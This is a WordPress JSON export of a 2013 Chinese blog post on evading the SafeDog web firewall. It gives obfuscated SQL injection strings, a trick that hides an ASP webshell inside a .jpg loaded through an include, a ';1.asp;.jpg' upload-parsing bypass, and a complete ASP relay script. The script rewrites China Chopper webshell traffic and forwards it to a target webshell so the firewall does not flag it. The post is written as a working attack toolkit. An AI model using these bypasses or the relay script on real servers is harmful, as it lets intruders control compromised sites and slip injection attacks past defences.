{"id":152,"date":"2013-04-23T08:00:00","date_gmt":"2013-04-23T00:00:00","guid":{"rendered":"http:\/\/31.0.2.219:81\/?p=152"},"modified":"2014-03-11T13:57:49","modified_gmt":"2014-03-11T05:57:49","slug":"safedog-%e5%ae%89%e5%85%a8%e7%8b%97%e9%a5%b6%e8%bf%87%e6%96%b9%e6%b3%95","status":"publish","type":"post","link":"http:\/\/www.huike007.cn\/?p=152","title":{"rendered":"safedog \u5b89\u5168\u72d7\u9976\u8fc7\u65b9\u6cd5"},"content":{"rendered":"

1.\u8fc7\u6ce8\u5165
\n2.\u8fc7\u5927\u9a6c\u88ab\u963b\u62e6\u8bbf\u95ee
\n3.\u8fc7\u83dc\u5200\u8fde\u63a5\u4e00\u53e5\u8bdd\u88ab\u62e6\u622a
\n4.\u8fc71.asp;.jpg\u8fd9\u6837\u7684\u6587\u4ef6
\n\u5176\u4ed6\u6211\u6ca1\u9047\u5230\u4e86\u3002\u3002
\n\u73b0\u5728\u4e00\u70b9\u4e00\u70b9\u8bb2\uff1a
\n1.\u8fc7\u6ce8\u5165
\n\u65b9\u6cd5\u4e00\uff1aa.asp?aaa=%00&id=sql\u8bed\u53e5
\n\u65b9\u6cd5\u4e8c\uff1a a.asp?id=sql\u8bed\u53e5 \u91cc\u9762\u628a\u5b89\u5168\u8fc7\u6ee4\u7684\u52a0\u4e2a%l \u6bd4\u5982\uff1a un%aion sel%aect 1,2,3,4 fr%aom admin
\n2.\u8fc7\u5927\u9a6c\u88ab\u963b\u62e6\u8bbf\u95ee
\n\u65b9\u6cd5\u4e00\uff1a\u4e0a\u4f20\u4e00\u4e2a\u5927\u9a6c \u7136\u540e\u8bbf\u95eehttp:\/\/sss.com\/dama.asp \u8bbf\u95ee\u540e\u51fa\u73b0\u62e6\u622a\u3002
\n\u90a3\u4e48\u89e3\u51b3\u65b9\u6cd5 \u5148\u5c06dama.asp\u6539\u540ddama.jpg\u4e0a\u4f20\uff0c\u7136\u540e\u5728\u540c\u76ee\u5f55\u4e0a\u4f20\u4e2a\u6587\u4ef6da.asp \u5185\u5bb9\u4e3a\uff1a <!–#include file="dama.jpg" –> \u8fd9\u6837\u518d\u8bbf\u95eeda.asp \u5c31\u4e0d\u4f1a\u88ab\u62e6\u622a\u4e86\u3002
\n3.\u8fc7\u83dc\u5200\u8fde\u63a5\u4e00\u53e5\u8bdd\u88ab\u62e6\u622a
\n\u65b9\u6cd5\u4e00\uff1a\u4e0d\u7528\u83dc\u5200\u8fde\u63a5\u4e00\u53e5\u8bdd\uff0c\u7528\u522b\u7684\u4e00\u53e5\u8bdd\u8fde\u63a5\u7aef\u3002
\n\u65b9\u6cd5\u4e8c\uff1a\u4e2d\u8f6c\u4e0b\u8fde\u63a5\u83dc\u5200\uff0c\u628a\u8fc7\u6ee4\u6389\u7684\u8bcd\u66ff\u6362\u6389\u3002
\n4.\u8fc71.asp;.jpg\u8fd9\u6837\u7684\u6587\u4ef6\u62e6\u622a
\n\u65b9\u6cd5\u4e00\uff1a;1.asp;.jpg
\n\u65b9\u6cd5\u4e8c\uff1a\u4fdd\u5bc6
\n\u5177\u4f53\u5c31\u4e3a\u5927\u5bb6\u603b\u7ed3\u8fd9\u4e48\u591a\u4e86\uff0c\u5b89\u5168\u72d7 \u53cd\u6b63\u57fa\u672c\u53ef\u4ee5\u65e0\u89c6\u4e86\uff01\uff01
\n\u5927\u5bb6\u8fd8\u6709\u4ec0\u4e48\u8981\u8865\u5145\u7684\u53ef\u4ee5\u53d1\u5728\u4e0b\u9762\uff01
\n\u4e0b\u9762\u8fd9\u4e2a\u811a\u672c\u662f\u8fc7\u5b89\u5168\u72d7\u8fde\u63a5\u83dc\u5200\u7528\u7684 \u7528\u6cd5\uff1a \u5148\u628a\u8fd9\u4e2a\u811a\u672c\u653e\u5230\u4e2a\u53ef\u6267\u884c.asp\u7684\u76ee\u5f55
\n\u7136\u540e\u8bbf\u95eehttp:\/\/www.xx.com\/asf.asp?dz=\u4f60\u8981\u8fc7\u7684\u90a3\u4e2awebshell\u5730\u5740
\n\u7136\u540e\u628a\u5730\u5740\u8f93\u5165\u8fdb\u83dc\u5200 \u5bc6\u7801\u8fd8\u662f\u4f60\u8981\u8fc7\u7684\u90a3\u4e2awebshell\u7684\u5bc6\u7801 \u7c7b\u578b\u4e5f\u662f\u9009\u62e9\u90a3\u4e2a\u4e00\u53e5\u8bdd\u6728\u9a6c\u7684\u540e\u7f00\u7c7b\u578b
\n\u4f8b\u5982\uff1ahttp:\/\/www.xx.com\/asf.asp?dz=http:\/\/xxx.com\/yijuhua.php \u5bc6\u7801
\n\u8fd9\u6837\u8f93\u5165\u5c31\u83dc\u5200
\n\u8fd9\u4e2a\u811a\u672c\u6682\u65f6\u652f\u6301.php .aspx\u7684\u4e00\u53e5\u8bdd\u8fde\u63a5 .asp\u7684\u53ef\u80fd\u8fd8\u4e0d\u884c \u6ca1\u6d4b\u8bd5\u8fc7\u3002\u5982\u679c\u8c01\u6709\u88c5\u4e86\u5b89\u5168\u72d7\u7684webshell\u53ef\u4ee5\u544a\u8bc9\u6211\u4e0b\u3002\u6211\u518d\u6d4b\u8bd5\u4e0b\u628a\u8fd9\u4e2a\u811a\u672c\u4fee\u6539\u5168\u9762\u90fd\u652f\u6301\uff01
\n<%
\n'\u9976\u8fc7\u7684\u539f\u7406\uff0c\u6293\u83dc\u5200\u8fde\u63a5webshell\u7684\u5305 \u7136\u540e\u7814\u7a76\u5b89\u5168\u72d7\u8fc7\u6ee4\u4e86\u54ea\u4e9b\u5173\u952e\u5b57 \u4e2d\u8f6c\u66ff\u6362\u6389\u90a3\u4e9b\u8fc7\u6ee4\u7684\u5173\u952e\u5b57 \u5c31\u6210\uff01
\nJmStr=Replace(Request.Form,"$_POST","$_REQUEST")
\nJmStr=Replace(JmStr,"->|","–>|")
\nJmStr=Replace(JmStr,"@eval(","@eval (")
\nJmStr=Replace(JmStr,"System.Convert.FromBase64String","System.Convert. FromBase64String")
\nJMUrl=request("dz")
\nresponse.write request("dz")
\nJmRef=JMUrl
\nJmCok=""
\n'\u83dc\u5200\u7a81\u7834\u5b89\u5168\u72d7\u8fde\u63a5\uff01
\nresponse.write PostData(JMUrl,JmStr,JmCok,JmRef)
\nFunction PostData(PostUrl,PostStr,PostCok,PostRef)
\nDim Http
\nSet Http = Server.CreateObject("msxml2.serverXMLHTTP")
\nWith Http
\n.Open "POST",PostUrl,False
\n.SetRequestHeader "Content-Length",Len(PostStr)
\n.SetRequestHeader "Content-Type","application\/x-www-form-urlencoded"
\n.SetRequestHeader "Referer",PostRef
\n'.SetRequestHeader "Cookie",PostCok
\n.Send PostStr
\nPostData = .ResponseBody
\nEnd With
\nSet Http = Nothing
\nPostData =bytes2BSTR(PostData)
\nEnd Function
\nFunction bytes2BSTR(vIn)
\nDim strReturn
\nDim I, ThisCharCode, NextCharCode
\nstrReturn = ""
\nFor I = 1 To LenB(vIn)
\nThisCharCode = AscB(MidB(vIn, I, 1))
\nIf ThisCharCode < &H80 Then
\nstrReturn = strReturn & Chr(ThisCharCode)
\nElse
\nNextCharCode = AscB(MidB(vIn, I + 1, 1))
\nstrReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
\nI = I + 1
\nEnd If
\nNext
\nbytes2BSTR = strReturn
\nEnd Function
\nFunction URLEncoding(vstrin)
\nstrReturn=""
\nDim i
\nFor i=1 To Len(vstrin)
\nThisChr=Mid(vstrin,i,1)
\nif Abs(Asc(ThisChr))< &HFF Then
\nstrReturn=strReturn & ThisChr
\nElse
\nInnerCode=Asc(ThisChr)
\nIf InnerCode<0 Then
\nInnerCode=InnerCode + &H10000
\nEnd If
\nHight1=(InnerCode And &HFF00) \\&HFF
\nLow1=InnerCode And &HFF
\nstrReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
\nEnd if
\nNext
\nstrReturn=Replace(strReturn,chr(32),"%20") '\u8f6c\u6362\u7a7a\u683c,\u5982\u679c\u7f51\u7ad9\u8fc7\u6ee4\u4e86\u7a7a\u683c,\u5c1d\u8bd5\u7528\/**\/\u6765\u4ee3\u66ff%20
\nstrReturn=Replace(strReturn,chr(43),"%2B") 'JMDCW\u589e\u52a0\u8f6c\u6362+\u5b57\u7b26
\n'strReturn=Replace(strReturn,\u8fc7\u6ee4\u5b57\u7b26,"\u8f6c\u6362\u4e3a\u5b57\u7b26") '\u5728\u6b64\u589e\u52a0\u8981\u8fc7\u6ee4\u7684\u4ee3\u7801
\nURLEncoding=strReturn
\nEnd Function
\n%><\/p>\n","protected":false},"excerpt":{"rendered":"

1.\u8fc7\u6ce8\u5165 2.\u8fc7\u5927\u9a6c\u88ab\u963b\u62e6\u8bbf\u95ee 3.\u8fc7\u83dc\u5200\u8fde\u63a5\u4e00\u53e5\u8bdd\u88ab\u62e6\u622a 4.\u8fc71.asp;.jpg\u8fd9\u6837\u7684\u6587\u4ef6 \u5176\u4ed6\u6211\u6ca1\u9047 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[180],"tags":[242,243],"_links":{"self":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/152"}],"collection":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=152"}],"version-history":[{"count":1,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/152\/revisions"}],"predecessor-version":[{"id":240,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=\/wp\/v2\/posts\/152\/revisions\/240"}],"wp:attachment":[{"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=152"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=152"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.huike007.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}